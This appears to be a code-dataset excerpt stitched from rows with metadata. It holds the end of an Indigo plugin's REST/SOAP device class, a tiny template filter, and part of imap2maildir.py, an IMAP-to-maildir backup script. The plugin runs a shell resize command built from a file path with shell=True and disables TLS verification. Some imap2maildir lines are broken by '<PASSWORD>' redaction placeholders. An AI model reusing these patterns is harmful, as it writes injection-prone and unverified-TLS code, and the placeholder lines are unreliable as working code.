self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] -=- binary data written to {1}-=-'.format(responseObj.status_code, saveLocation))
if command.commandName == CMD_DOWNLOADIMAGE:
imageResizeWidth = 0
imageResizeHeight = 0
if len(command.commandPayload) >= 7:
imageResizeWidth = int(command.commandPayload[6])
if len(command.commandPayload) >= 8:
imageResizeHeight = int(command.commandPayload[7])
resizeCommandLine = u''
if imageResizeWidth > 0 and imageResizeHeight > 0:
# we have a specific size as a target...
resizeCommandLine = u'sips -z {0} {1} {2}'.format(imageResizeHeight, imageResizeWidth, saveLocation)
elif imageResizeWidth > 0:
# we have a maximum size measurement
resizeCommandLine = u'sips -Z {0} {1}'.format(imageResizeWidth, saveLocation)
# if a command line has been formed, fire that off now...
if resizeCommandLine == u'':
self.hostPlugin.logger.debug(u'No image size specified for {0}; skipping resize.'.format(saveLocation))
else:
self.hostPlugin.logger.threaddebug(u'Executing resize via command line "{0}"'.format(resizeCommandLine))
try:
subprocess.Popen(resizeCommandLine, shell=True)
self.hostPlugin.logger.debug(u'{0} resized via sip shell command'.format(saveLocation))
except:
self.hostPlugin.logger.error(u'Error resizing image via sips')
# we have completed the download and processing successfully... allow the
# device (or its descendants) to process successful operations
self.notifySuccessfulDownload(command, saveLocation)
finally:
if not localFile is None:
localFile.close()
else:
self.hostPlugin.logger.error(u'Unable to complete download action - no filename specified')
else:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
elif responseObj.status_code == 401:
self.handleRESTfulError(command, u'401 - Unauthorized', responseObj)
else:
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
# the response value really should not be defined here as it bailed without
# catching any of our response error conditions
self.handleRESTfulError(command, e, None)
elif command.commandName == CMD_SOAP_REQUEST or command.commandName == CMD_JSON_REQUEST:
responseObj = None
try:
# this is to post a SOAP request to a web service... this will be similar to a restful put request
# but will contain a body payload
self.hostPlugin.logger.threaddebug(u'Received SOAP/JSON command request: {0}'.format(command.commandPayload))
soapPayloadParser = re.compile(r"^\s*([^\n]+)\n\s*([^\n]+)\n(.*)$", re.DOTALL)
soapPayloadData = soapPayloadParser.match(command.commandPayload)
soapPath = soapPayloadData.group(1).strip()
soapAction = soapPayloadData.group(2).strip()
soapBody = soapPayloadData.group(3).strip()
fullGetUrl = u'http://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_str(deviceHTTPAddress[1]) + RPFrameworkUtils.to_str(soapPath)
self.hostPlugin.logger.debug(u'Processing SOAP/JSON operation to {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
if command.commandName == CMD_SOAP_REQUEST:
customHeaders["Content-type"] = "text/xml; charset=\"UTF-8\""
customHeaders["SOAPAction"] = RPFrameworkUtils.to_str(soapAction)
else:
customHeaders["Content-type"] = "application/json"
# execute the URL post to the web service
self.hostPlugin.logger.threaddebug(u'Sending SOAP/JSON request:\n{0}'.format(soapBody))
self.hostPlugin.logger.threaddebug(u'Using headers: \n{0}'.format(customHeaders))
responseObj = requests.post(fullGetUrl, headers=customHeaders, verify=False, data=RPFrameworkUtils.to_str(soapBody))
if responseObj.status_code == 200:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
else:
self.hostPlugin.logger.threaddebug(u'Command Response was not HTTP OK, handling RESTful error')
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
self.handleRESTfulError(command, e, responseObj)
else:
# this is an unknown command; dispatch it to another routine which is
# able to handle the commands (to be overridden for individual devices)
self.handleUnmanagedCommandInQueue(deviceHTTPAddress, command)
# if the command has a pause defined for after it is completed then we
# should execute that pause now
if command.postCommandPause > 0.0 and continueProcessingCommands == True:
self.hostPlugin.logger.threaddebug(u'Post Command Pause: {0}'.format(command.postCommandPause))
time.sleep(command.postCommandPause)
# complete the dequeuing of the command, allowing the next
# command in queue to rise to the top
commandQueue.task_done()
lastQueuedCommandCompleted = emptyQueueReducedWaitCycles
# when the queue is empty, pause a bit on each iteration
if continueProcessingCommands == True:
# if we have just completed a command recently, half the amount of
# wait time, assuming that a subsequent command could be forthcoming
if lastQueuedCommandCompleted > 0:
time.sleep(self.emptyQueueProcessingThreadSleepTime/2)
lastQueuedCommandCompleted = lastQueuedCommandCompleted - 1
else:
time.sleep(self.emptyQueueProcessingThreadSleepTime)
# check to see if we need to issue an update...
if updateStatusPollerNextRun is not None and time.time() > updateStatusPollerNextRun:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
# handle any exceptions that are thrown during execution of the plugin... note that this
# should terminate the thread, but it may get spun back up again
except SystemExit:
pass
except Exception:
self.hostPlugin.logger.exception(u'Exception in background processing')
except:
self.hostPlugin.logger.exception(u'Exception in background processing')
finally:
self.hostPlugin.logger.debug(u'Command thread ending processing')
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should return the HTTP address that will be used to connect to the
# RESTful device. It may connect via IP address or a host name
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def getRESTfulDeviceAddress(self):
return None
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should be overridden in individual device classes whenever they must
# handle custom commands that are not already defined
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):
pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called prior to any network operation to allow the addition
# of custom headers to the request (does not include file download)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def addCustomHTTPHeaders(self, httpRequest):
pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will process any response from the device following the list of
# response objects defined for this device type. For telnet this will always be
# a text string
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleDeviceTextResponse(self, responseObj, rpCommand):
# loop through the list of response definitions defined in the (base) class
# and determine if any match
responseText = responseObj.text
for rpResponse in self.hostPlugin.getDeviceResponseDefinitions(self.indigoDevice.deviceTypeId):
if rpResponse.isResponseMatch(responseText, rpCommand, self, self.hostPlugin):
self.hostPlugin.logger.threaddebug(u'Found response match: {0}'.format(rpResponse.responseId))
rpResponse.executeEffects(responseText, rpCommand, self, self.hostPlugin)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle an error as thrown by the REST call... it allows
# descendant classes to do their own processing
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleRESTfulError(self, rpCommand, err, response=None):
if rpCommand.commandName == CMD_RESTFUL_PUT or rpCommand.commandName == CMD_RESTFUL_GET:
self.hostPlugin.logger.exception(u'An error occurred executing the GET/PUT request (Device: {0}): {1}'.format(self.indigoDevice.id, err))
else:
self.hostPlugin.logger.exception(u'An error occurred processing the SOAP/JSON POST request: (Device: {0}): {1}'.format(self.indigoDevice.id, err))
if not response is None and not response.text is None:
self.hostPlugin.logger.debug(RPFrameworkUtils.to_unicode(response.text))
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle notification to the device whenever a file was successfully
# downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def notifySuccessfulDownload(self, rpCommand, outputFileName):
pass
|
en
| 0.515262
|
#! /usr/bin/env python # -*- coding: utf-8 -*- #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>> # This class is a concrete implementation of the RPFrameworkDevice as a device which # communicates via a REST style HTTP connection. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Python imports #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Constants and configuration variables #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkRESTfulDevice # This class is a concrete implementation of the RPFrameworkDevice as a device which # communicates via a REST style HTTP connection. #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////// # Class construction and destruction methods #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Constructor called once upon plugin class receiving a command to start device # communication. Defers to the base class for processing but initializes params #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #///////////////////////////////////////////////////////////////////////////////////// # Processing and command functions #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine is designed to run in a concurrent thread and will continuously monitor # the commands queue for work to do. #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # obtain the IP or host address that will be used in connecting to the # RESTful service via a function call to allow overrides # retrieve any configuration information that may have been setup in the # plugin configuration and/or device configuration # begin the infinite loop which will run as long as the queue contains commands # and we have not received an explicit shutdown request # process pending commands now... # the command name will identify what action should be taken... we will handle the known # commands and dispatch out to the device implementation, if necessary, to handle unknown # commands # specialized command to instanciate the concurrent thread # safely ignore this... just used to spin up the thread # if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that # devices are created properly (RESTFul devices may respond too fast since no connection need be established) # a specialized command designed to stop the processing thread indigo # the event of a shutdown # the amount of time to sleep should be a float found in the # payload of the command # this command instructs the plugin to update the full status of the device (all statuses # that may be read from the device should be read) # this is a request to send a Wake-On-LAN request to a network-enabled device # the command payload should be the MAC address of the device to wake up # gather all of the parameters from the command payload # the payload should have the following format: # [0] => request method (http|https|etc.) # [1] => path for the GET operation # [2] => authentication type: none|basic|digest # [3] => username # [4] => password # # CMD_DOWNLOADFILE or CMD_DOWNLOADIMAGE # [5] => download filename/path # [6] => image resize width # [7] => image resize height # # CMD_RESTFUL_PUT # [5] => data to post as the body (if any, may be blank) # execute the URL fetching depending upon the method requested # if the network command failed then allow the error processor to handle the issue # the response handling will depend upon the type of command... binary returns must be # handled separately from (expected) text-based ones # this is a binary return that should be saved to the file system without modification # execute the actual save from the binary response stream # we have a specific size as a target... # we have a maximum size measurement # if a command line has been formed, fire that off now... # we have completed the download and processing successfully... allow the # device (or its descendants) to process successful operations # handle this return as a text-based return # the response value really should not be defined here as it bailed without # catching any of our response error conditions # this is to post a SOAP request to a web service... this will be similar to a restful put request # but will contain a body payload # execute the URL post to the web service # handle this return as a text-based return # this is an unknown command; dispatch it to another routine which is # able to handle the commands (to be overridden for individual devices) # if the command has a pause defined for after it is completed then we # should execute that pause now # complete the dequeuing of the command, allowing the next # command in queue to rise to the top # when the queue is empty, pause a bit on each iteration # if we have just completed a command recently, half the amount of # wait time, assuming that a subsequent command could be forthcoming # check to see if we need to issue an update... # handle any exceptions that are thrown during execution of the plugin... note that this # should terminate the thread, but it may get spun back up again #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine should return the HTTP address that will be used to connect to the # RESTful device. It may connect via IP address or a host name #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine should be overridden in individual device classes whenever they must # handle custom commands that are not already defined #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will be called prior to any network operation to allow the addition # of custom headers to the request (does not include file download) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will process any response from the device following the list of # response objects defined for this device type. For telnet this will always be # a text string #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # loop through the list of response definitions defined in the (base) class # and determine if any match #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will handle an error as thrown by the REST call... it allows # descendant classes to do their own processing #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will handle notification to the device whenever a file was successfully # downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| 1.517295
| 2
|
app/customfilters.py
|
razage/TTracker3
| 0
|
6627643
|
def statusname(sid):
from app import app
return app.config["STATUSES"][sid]
|
def statusname(sid):
from app import app
return app.config["STATUSES"][sid]
|
none
| 1
| 1.506923
| 2
|
|
imap2maildir.py
|
rtucker/imap2maildir
| 55
|
6627644
|
<reponame>rtucker/imap2maildir
#!/usr/bin/env python
"""
Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox.
Intended for keeping a local backup of a remote IMAP4 mailbox to protect
against loss. Very handy for backing up "[Gmail]/All Mail" from your
Gmail account, to snag all your archived mail. Re-running it on a regular
basis will update only the stuff it needs to.
Once I need to, I'll write a restore script ;-)
<NAME> <<EMAIL>>
TODO:
PEP-0008 compliance
- Docstrings
"""
version = "%prog 1.10.2 20101018"
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
import email
import getpass
import hashlib
import logging
import mailbox
import optparse
import os
import re
try:
import rfc822
except ImportError:
import rfc822py3 as rfc822
import simpleimap
import sqlite3
import sys
import time
# Handler for logging/debugging/output
log = logging.getLogger(__name__)
console = logging.StreamHandler()
log.addHandler(console)
# Some reasonable application defaults
defaults = {
'debug': 1,
'password': <PASSWORD>,
'hostname': 'imap.gmail.com',
'ssl': True,
'port': False,
'remotefolder': '[Gmail]/All Mail',
'create': False,
'maxmessages': 0,
'configfile': 'imap2maildir.conf',
'turbo': True,
'type': 'maildir',
'mboxdash': False,
'search': 'SEEN',
}
class SeenMessagesCache(object):
""" Cache for seen message UIDs and Hashes
"""
def __init__(self):
""" Constructor
"""
self.uids = None
self.hashes = None
class lazyMaildir(mailbox.Maildir):
""" Override the _refresh method, based on patch from
http://bugs.python.org/issue1607951
by A.M. Kuchling, 2009-05-02
"""
def __init__(self, dirname, factory=rfc822.Message, create=True):
"""Initialize a lazy Maildir instance."""
mailbox.Maildir.__init__(self, dirname, factory, create)
self._last_read = None # Records the last time we read cur/new
def _refresh(self):
"""Update table of contents mapping."""
new_mtime = os.path.getmtime(os.path.join(self._path, 'new'))
cur_mtime = os.path.getmtime(os.path.join(self._path, 'cur'))
if (self._last_read is not None and
new_mtime <= self._last_read and cur_mtime <= self._last_read):
return
self._toc = {}
def update_dir (subdir):
""" update_dir
"""
path = os.path.join(self._path, subdir)
for entry in os.listdir(path):
p = os.path.join(path, entry)
if os.path.isdir(p):
continue
uniq = entry.split(self.colon)[0]
self._toc[uniq] = os.path.join(subdir, entry)
update_dir('new')
update_dir('cur')
# We record the current time - 1sec so that, if _refresh() is called
# again in the same second, we will always re-read the mailbox
# just in case it's been modified. (os.path.mtime() only has
# 1sec resolution.) This results in a few unnecessary re-reads
# when _refresh() is called multiple times in the same second,
# but once the clock ticks over, we will only re-read as needed.
now = int(time.time() - 1)
self._last_read = time.time() - 1
def make_hash(size, date, msgid):
""" Returns a hash of a message given the size, date, and msgid thingies.
"""
return hashlib.sha1('%i::%s::%s' % (size, date, msgid)).hexdigest()
def open_sql_session(filename):
""" Opens a SQLite database, initializing it if required
"""
log.debug("Opening sqlite3 database '%s'" % filename)
conn = sqlite3.connect(filename)
c = conn.cursor()
# gather info about the seenmessages table
c.execute('pragma table_info(seenmessages)')
columns = ' '.join(i[1] for i in c.fetchall()).split()
if columns == []:
# need to create the seenmessages table
c.execute("""create table seenmessages
(hash text not null unique, mailfile text not null, uid integer, folder text)""")
else:
if not 'uid' in columns:
# old db; need to add a column for uid
c.execute("""alter table seenmessages add column uid integer""")
if not 'folder' in columns:
# need to add a column for folder
c.execute("""alter table seenmessages add column folder text""")
conn.commit()
return conn
def check_message(conn, mbox, hash=None, uid=None, seencache=None):
""" Checks to see if a given message exists.
"""
c = conn.cursor()
if seencache:
if seencache.hashes is None:
# Populate the hash cache
log.debug("Populating hash cache...")
seencache.hashes = {}
c.execute('select hash,folder,mailfile from seenmessages')
for result in c:
seencache.hashes[str(result[0])] = (result[1], result[2])
log.debug("Hash cache: %i hashes" % len(seencache.hashes))
if seencache.uids is None:
# Populate the uid cache
log.debug("Populating uid cache...")
seencache.uids = {}
c.execute('select uid,folder,mailfile from seenmessages')
for result in c:
seencache.uids[str(result[0])] = (result[1], result[2])
log.debug("Uid cache: %i uids" % len(seencache.uids))
if hash:
if str(hash) in seencache.hashes:
folder, mailfile = seencache.hashes[hash]
else:
c.execute('select folder,mailfile from seenmessages where hash=?', (hash,))
row = c.fetchone()
if row:
log.debug("Cache miss on hash %s", hash)
folder, mailfile = row
else:
return False
elif uid:
if str(uid) in seencache.uids:
folder, mailfile = seencache.uids[str(uid)]
else:
c.execute('select folder,mailfile from seenmessages where uid=?', (uid,))
row = c.fetchone()
if row:
log.debug("Cache miss on uid %s" % uid)
folder, mailfile = row
else:
return False
else:
return False
if str(mailfile).startswith('POISON-'):
# This is a fake poison filename! Assume truth.
log.warning("Poison filename detected; assuming the message "
"exists and all is well: %s :: %s",
hash or uid, mailfile)
return True
elif isinstance(mbox, mailbox.mbox):
# mailfile will be an int
return int(mailfile) in mbox
elif isinstance(mbox, lazyMaildir):
# mailfile will be a string; use mbox.get because it is faster
if folder:
fmbox = mbox.get_folder(folder)
return fmbox.get(mailfile)
return mbox.get(mailfile)
else:
# uhh let's wing it
return mailfile in mbox
def store_hash(conn, hash, mailfile, uid):
""" Given a database connection, hash, mailfile, and uid,
stashes it in the database
"""
c = conn.cursor()
# nuke it if it's already there. (can happen if disk file goes away)
cur = c.execute('delete from seenmessages where hash = ?', (hash, ))
if cur.rowcount > 0:
log.debug('!!! Nuked duplicate hash %s' % hash)
c.execute('insert into seenmessages values (?,?,?,?)', (hash, mailfile, uid, ''))
conn.commit()
def add_uid_to_hash(conn, hash, uid):
""" Adds a uid to a hash that's missing its uid
"""
c = conn.cursor()
c.execute('update seenmessages set uid = ? where hash = ?', (uid, hash))
conn.commit()
def open_mailbox_maildir(directory, create=False):
""" There is a mailbox here.
"""
return lazyMaildir(directory, create=create)
def open_mailbox_mbox(filename, create=False):
""" Open a mbox file, lock for writing
"""
mbox = mailbox.mbox(filename, create=create)
mbox.lock()
return mbox
def smells_like_maildir(working_dir):
""" Quick check for the cur/tmp/new folders
"""
return os.path.exists(os.path.join(working_dir, 'cur')) and \
os.path.exists(os.path.join(working_dir, 'new')) and \
os.path.exists(os.path.join(working_dir, 'tmp'))
def parse_config_file(defaults,configfile='imap2maildir.conf'):
""" Parse config file, if exists.
Returns a tuple with a ConfigParser instance and either True or
False, depending on whether the config was read...
"""
config = ConfigParser(defaults)
if config.read(configfile):
log.debug('Reading config from ' + configfile)
return (config, True)
else:
log.debug('No config found at ' + configfile)
return (config, False)
class FirstOptionParser(optparse.OptionParser):
""" Adjusts parse_args so it won't complain too heavily about
options that don't exist.
Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py
"""
def parse_args(self, args=None, values=None):
"""
parse_args(args : [string] = sys.argv[1:],
values : Values = None)
-> (values : Values, args : [string])
Parse the command-line options found in 'args' (default:
sys.argv[1:]). Any errors result in a call to 'error()', which
by default prints the usage message to stderr and calls
sys.exit() with an error message. On success returns a pair
(values, args) where 'values' is an Values instance (with all
your option values) and 'args' is the list of arguments left
over after parsing options.
"""
rargs = self._get_args(args)
if values is None:
values = self.get_default_values()
self.rargs = rargs
self.largs = largs = []
self.values = values
while 1:
try:
stop = self._process_args(largs, rargs, values)
break
except optparse.BadOptionError:
# Just a bad option, let's try this again
pass
except (optparse.OptionValueError) as err:
self.error(str(err))
args = largs + rargs
return self.check_values(values, args)
def parse_options(defaults):
""" First round of command line parsing: look for a -c option.
"""
firstparser = FirstOptionParser(add_help_option=False)
firstparser.set_defaults(configfile=defaults['configfile'])
firstparser.add_option("-c", "--config-file", dest="configfile")
(firstoptions, firstargs) = firstparser.parse_args()
# Parse a config file
(parsedconfig, gotconfig) = parse_config_file(
defaults, configfile=firstoptions.configfile)
# Parse command line options
usage = "usage: %prog [options]"
description = "A script to copy a remote IMAP folder to a local mail "
description += "storage area. Ideal for incremental backups of mail "
description += "from free webmail providers, or perhaps as an "
description += "alternative to fetchmail. Supports mbox and maildir, "
description += "despite the name. "
description += "See COPYRIGHT for your rights; "
description += "https://github.com/rtucker/imap2maildir/ for info."
if gotconfig:
description = description + '\n\nConfiguration defaults read from \
file "%s"' % firstoptions.configfile
parser = optparse.OptionParser(usage=usage, version=version,
description=description)
# Set up some groups
required = optparse.OptionGroup(parser, "Required options")
optional = optparse.OptionGroup(parser, "Optional and debugging options")
# Set the defaults...
if gotconfig: sectionname = 'imap2maildir'
else: sectionname = 'DEFAULT'
clist = parsedconfig.items(sectionname, raw=True)
for i in clist:
iname = i[0]
if i[1] == 'False': ivalue = False
elif i[1] == 'True': ivalue = True
elif i[0] in ['port', 'debug', 'maxmessages']: ivalue = int(i[1])
else: ivalue = i[1]
parser.set_default(iname, ivalue)
# Define the individual options
required.add_option("-u", "--username", dest="username",
help="Username for authentication to IMAP server", metavar="USERNAME")
required.add_option("-d", "--destination", dest="destination",
help="Where to store the mail, e.g. ~/Backups/Gmail",
metavar="PATH")
optional.add_option("-p", "--password", dest="password",
help="Password for IMAP server. Default: prompt user",
metavar="PASSWORD")
optional.add_option("-H", "--hostname", dest="hostname",
help="Hostname of IMAP server, default: %default", metavar="HOSTNAME")
optional.add_option("-P", "--port", dest="port",
help="Port number. Default: 993 (SSL), 143 (clear)", metavar="PORT")
optional.add_option("-v", "--verbose", dest="debug",
help="Turns up the verbosity", action="store_const", const=2)
optional.add_option("-q", "--quiet", dest="debug",
help="Quiets all output (except prompts and errors)",
action="store_const", const=0)
optional.add_option("-r", "--remote-folder", dest="remotefolder",
help="Remote IMAP folder. Default: %default",
metavar="FOLDERNAME")
optional.add_option("-s", "--search", dest="search",
help="IMAP4 search criteria to use. Default: %default",
metavar="CRITERIA")
optional.add_option("--create", dest="create",
help="If --destination doesn't exist, create it", action="store_true")
optional.add_option("--no-turbo", "-T", dest="turbo",
help="Check for message locally before asking IMAP. Default: %default",
action="store_false")
optional.add_option("-m", "--max-messages", dest="maxmessages",
help="How many messages to process in one run (0=infinite). " +
"Default: %default",
metavar="MAX", type="int")
optional.add_option("-c", "--config-file", dest="configfile",
help="Configuration file to use. Default: %default")
optional.add_option("-S", "--ssl", dest="ssl",
help="Use SSL to connect, default: %default", action="store_true")
optional.add_option("-t", "--type", dest="type", action="store",
help="Mailbox type. Choice of: maildir, mbox. Default: %default",
choices=['maildir', 'mbox'])
optional.add_option("--mboxdash", dest="mboxdash", action="store_true",
help="Use - in the mbox From line instead of sender's address. " +
"Default: %default")
# Parse
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
# Check for required options
if not options.username:
parser.error("Must specify a username (-u/--username).")
if not options.destination:
parser.error("Must specify a destination directory (-d/--destination).")
if not os.path.exists(options.destination):
if options.create:
pass
else:
parser.error("Destination '%s' does not exist. Use --create."
% options.destination)
elif (options.type == 'maildir'
and not smells_like_maildir(options.destination)):
parser.error("Directory '%s' exists, but it isn't a maildir."
% options.destination)
if not options.password:
options.password = <PASSWORD>()
# Set up debugging
if options.debug == 0:
log.setLevel(logging.ERROR)
elif options.debug == 1:
log.setLevel(logging.INFO)
else:
log.setLevel(logging.DEBUG)
return options
def copy_messages_by_folder(folder, db, imap, mbox, limit=0, turbo=False,
mboxdash=False, search=None, seencache=None):
"""Copies any messages that haven't yet been seen from imap to mbox.
copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(),
db=open_sql_session(),
imap=simpleimap.SimpleImapSSL(),
mbox=open_mailbox_*(),
limit=max number of messages to handle (0 = inf),
turbo=boolean,
mboxdash=use '-' for mbox From line email?,
search=imap criteria (string),
seencache=an object to cache seen messages,
Returns: {'total': total length of folder,
'handled': total messages handled,
'copied': total messages copied,
'copiedbytes': size of total messages copied,
'lastuid': last UID seen}
"""
outdict = {'turbo': 0, 'handled': 0, 'copied': 0, 'copiedbytes': 0, 'lastuid': 0}
outdict['total'] = len(folder)
log.info("Synchronizing %i messages from %s:%s to %s..." % (outdict['total'], folder.host, folder.folder, mbox._path))
msgpath = os.path.join(mbox._path, 'new')
if turbo:
# This will pass the check_message function and some useful cargo
# along to the Summaries() function in the FolderClass. It will
# use this to check the local cache for the message before hitting
# the outside world. (TODO: Make this less suckful.)
log.debug('TURBO MODE ENGAGED!')
folder.__turbo__(lambda uid: check_message(db, mbox, uid=str(uid), seencache=seencache))
else:
log.debug('Not using turbo mode...')
folder.__turbo__(None)
# Iterate through the message summary dicts for the folder.
for i in folder.Summaries(search=search):
# i = {'uid': , 'msgid': , 'size': , 'date': }
# Seen it yet?
msghash = make_hash(i['size'], i['date'], i['msgid'])
if not check_message(db, mbox, hash=msghash, seencache=seencache):
# Hash not found, copy it.
try:
message = imap.get_message_by_uid(i['uid'])
except Exception:
log.exception('ERROR: Could not retrieve message: %s' % repr(i))
if outdict['handled'] < 1:
log.error("Adding message hash %s to seencache, to avoid "
"future problems...", msghash)
store_hash(db, msghash, 'POISON-%s' % msghash, i['uid'])
add_uid_to_hash(db, msghash, i['uid'])
break
if mboxdash:
envfrom = '-'
else:
envfrom = i['envfrom']
